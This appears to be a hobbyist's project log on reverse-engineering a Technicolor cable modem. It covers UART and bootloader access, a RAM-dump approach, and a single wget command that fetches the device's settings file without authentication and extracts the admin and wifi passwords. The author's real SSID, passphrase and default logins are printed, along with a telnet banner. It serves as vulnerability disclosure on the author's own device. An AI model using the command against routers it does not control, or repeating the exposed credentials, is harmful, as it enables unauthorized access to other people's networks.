rawe-
uart commandline
01/21/2015 at 22:20 • 0 commentsfinally I've got a unit the cable provider does not want back, so it is time to open it up and check for the two UART interfaces.. One UART interface provides bootloader access, the other one linux /dev/ttyS0. There is one SPI flash of 1megabyte, one parallel nand flash chip and one DDR ram chip.
<insert pic here>
the linux login does not work (admin/admin), as the session terminates immediately after login.
It is not possible to dump the flash content by the bootloader as the memory dump function only handles addresses 0x80000000 and up. Fortunately the boot images seem to get loaded into this address space during bootup which may make the system cold-boot-attackable. E.g. power up the device, reset it and then dump the RAM contents. As this takes ages to dump megabytes of data over uart, here is just the stirngs command on the first few dumped kilobytes after 0x80000000 to prove that it is at least possible to get some useful data out of this:
!@ @T@ b4BM Bldr 2.4.0alpha18p1 Bldr LVGbootloader image1 image2 linux linuxapps permnv dhtml dynnv linuxkfs ...
(these strings are used by the bootloader for the flash partition overview table printed on startup).
Next steps are to check the available address space (too high addresses crash the unit). If it is possible to address 128megabytes after 0x80000000 the real physical memory is mapped to these addresses.
from linux bootlog:
[ 21.310000] Serial: BCM63XX driver $Revision: 1.4 $
-
dump admin and wifi password from LAN
11/25/2014 at 20:11 • 0 commentsjust do a
wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | stringsand receive
8021 !UPC1386571 * + SKKMRPXP 27354285 Broadcom Broadcom TechnicolorAP 123456 #0x000102030405060708090A0B0C0D0EBB 0000001 CDP. RG.. admin Technicolor clock.via.net ntp.nasa.gov tick.ucla.edu FIRE T802 UPC1386571 2.4G UPC0118016 SKKMRPXP EZXRXZZE THOMSON THOMSON SKKMRPXP THOMSON THOMSON THOMSON UPC. <Admin MLog admin adminThe last two lines are the admin login (user admin, password admin). I leave them set to their default config, because it does not increase security to change them...
The wireless name is UPC1386571 and the password SKKMRPXP:
Cell 08 - Address: 8C:04:FF:*:*:* Channel:11 Frequency:2.462 GHz (Channel 11) Quality=54/70 Signal level=-56 dBm Encryption key:on ESSID:"UPC1386571" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s Mode:Master Extra:tsf=00000008198c21d5 Extra: Last beacon: 220ms ago IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : TKIP Pairwise Ciphers (2) : CCMP TKIP Authentication Suites (1) : PSK IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (2) : CCMP TKIP Authentication Suites (1) : PSKThere is no way to disable wireless (or edit the password) because I am greeted with the error message
The connection to the server was reset while the page was loading.
if I try to access the "Wireless" settings tab in the web UI. It is not possible to edit the dumped config file and write it back, because this is broken in current software.
De facto, anyone who figures out the algorithm that calcs the wifi password based on... well most propably just the MAC address or something other visible from the outside... can access my wireless network which I never activated (btw. internet was ordered WITHOUT wifi, because they want extra money for it!). If the wifi password is truely "random", the password is still only 8 digits only uppercase letters from which only E S P K M R X Z were observed so far (only 8!).
It is time to wrap that device in aluminium foil...
Edit: told you so... http://derstandard.at/2000028921659/UPC-Standard-WLAN-Passwoerter-kinderleicht-zu-knacken
I am sure TechnicolorAP / 123456 and the other strange strings are other login credentials, maybe used for telnet (did not try this on the internet connected/KabelBW provided unit):
Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]' Broadcom Corporation Embedded BFC Telnet Server (c) 2000-2008 WARNING: Access allowed by authorized users only. Login:
other source for CSRF Vulnerabilities: https://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/